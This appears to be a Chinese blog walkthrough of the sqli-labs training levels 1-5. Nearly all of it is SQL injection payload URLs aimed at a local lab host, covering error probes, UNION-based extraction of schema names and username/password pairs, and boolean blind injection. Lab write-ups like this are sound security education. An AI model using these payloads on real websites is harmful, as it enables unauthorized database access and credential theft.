sqli-labs通关1-5教程

Posted Riy

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqli-labs通关1-5教程相关的知识,希望对你有一定的参考价值。

前言:

好久没手注了,被问了手注相关问题,忘的一干二净,抽出时间把手注再回忆一下,把sqli-labs简单过一下吧。

Less-1(GET单引号字符型注入)

#输入单引号后报错
http://192.168.1.115/sqli-labs/Less-1/?id=1%27

#确定字段数
http://192.168.1.115/sqli-labs/Less-1/?id=1%27 order by 3%23
http://192.168.1.115/sqli-labs/Less-1/?id=1%27 order by 4%23

#联合查询查看页面是否有显示位
http://192.168.1.115/sqli-labs/Less-1/?id=1000%27 union select 1,2,3%23

#查询数据库名
http://192.168.1.115/sqli-labs/Less-1/?id=1000%27 union select 1,(select group_concat(schema_name)from information_schema.schemata),3%23

#查询表名
http://192.168.1.115/sqli-labs/Less-1/?id=1000%27 union select 1,(select group_concat(schema_name)from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema="security")%23

#爆列
http://192.168.1.115/sqli-labs/Less-1/?id=1000%27union select 1,group_concat(column_name),3 from information_schema.columns where table_name=\'users\' %23

#爆值
http://192.168.1.115/sqli-labs/Less-1/?id=1000%27union select 1,group_concat(username,password),3 from users %23

Less-2(GET整型注入)

#查看页面变化
http://192.168.1.115/sqli-labs/Less-2/?id=1 and 1=1
http://192.168.1.115/sqli-labs/Less-2/?id=1 and 1=2
#确定数字段
http://192.168.1.115/sqli-labs/Less-2/?id=1 order by 3%23
http://192.168.1.115/sqli-labs/Less-2/?id=1 order by 4%23
#联合查询查看显示位
http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,2,3
#爆库
http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,(select group_concat(schema_name)from information_schema.schemata),3
#爆表
http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,(select group_concat(schema_name)from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema="security")
#爆列
http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=\'users\'
#爆值
http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,group_concat(username,password),3 from users

Less-3(GET单引号变形字符型注入)

#查看页面报错
http://192.168.1.115/sqli-labs/Less-2/?id=1\'
http://192.168.1.115/sqli-labs/Less-3/?id=1%27)%20%23
#确定数字段
http://192.168.1.115/sqli-labs/Less-3/?id=0%27) order by 3%23
http://192.168.1.115/sqli-labs/Less-3/?id=0%27) order by 4%23
#联合查询查看显示位
http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union%20select%201,2,3%23
#爆库
http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union select 1,(select group_concat(schema_name)from information_schema.schemata),3%23
#爆表
http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union select 1,(select group_concat(schema_name)from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema="security")%23
#爆列
http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union select 1,group_concat(column_name),3 from information_schema.columns where table_name=\'users\'%23
#爆值
http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union select 1,group_concat(username,password),3 from users%23

Less-4(GET双引号字符型注入)

http://192.168.1.115/sqli-labs/Less-4/?id=1%22

http://192.168.1.115/sqli-labs/Less-4/?id=1%22)%20%23

查看报错信息,使用双引号、右括号闭合,其余按照联合查询流程即可

Less-5(基于布尔的盲注)

#判断数据库版本,left(code, 1)表示取code字段从左截取1位
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(version(),1)=4 %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(version(),1)=5 %23

#判断数据库长度,使用length()判断长度,二分法可提高效率
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length(database())>5 %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length(database())>10 %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length(database())=8 %23

#猜当前数据库名,left(code, 1)表示取code字段从左截取1位,截取至数据库长度即可判断出数据库名
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),1)>\'r\' %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),1)>\'t\' %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),1)=\'s\' %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),2)>\'d\' %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),2)>\'f\' %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),2)=\'e\' %23
...

#判断表的个数,count()函数是用来统计表中记录的一个函数,返回匹配条件的行数。
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and (select count(table_name) from information_schema.tables where table_schema=database())>0  %23

#判断表的长度,limit可以被用于强制select语句返回指定的记录数。
// SELECT * FROM table LIMIT 5,10; // 检索记录行 6-15
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>5 %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>10 %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6 %23

#依次猜表名,substr(string,start,length);string为要截取的字符串;start为截取的起始位置;length为截取长度。
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>80 %23
...类似

#确定列数
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and (select count(column_name) from information_schema.columns where table_schema=database() and table_name = \'users\')>0 %23

#确定列的长度
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length((select  column_name from information_schema.columns where table_schema=database() and table_name = \'users\' limit 0,1)) > 0 %23

#依次猜列名
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name = \'users\' limit 0,1),1,1))>79  %23

#确定数据
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and ascii(substr((select username from users limit 0,1),1,1))>79  %23

以上是关于sqli-labs通关1-5教程的主要内容,如果未能解决你的问题,请参考以下文章

Sqli-labs通关手册1-30关

Sqli-LABS通关笔录-4

详细sqli-labs(1-65)通关讲解

Sqli-LABS通关笔录-7[文件写入函数Outfile]

Sqli-LABS通关笔录-17-审计SQL注入

Sqli-LABS通关笔录-16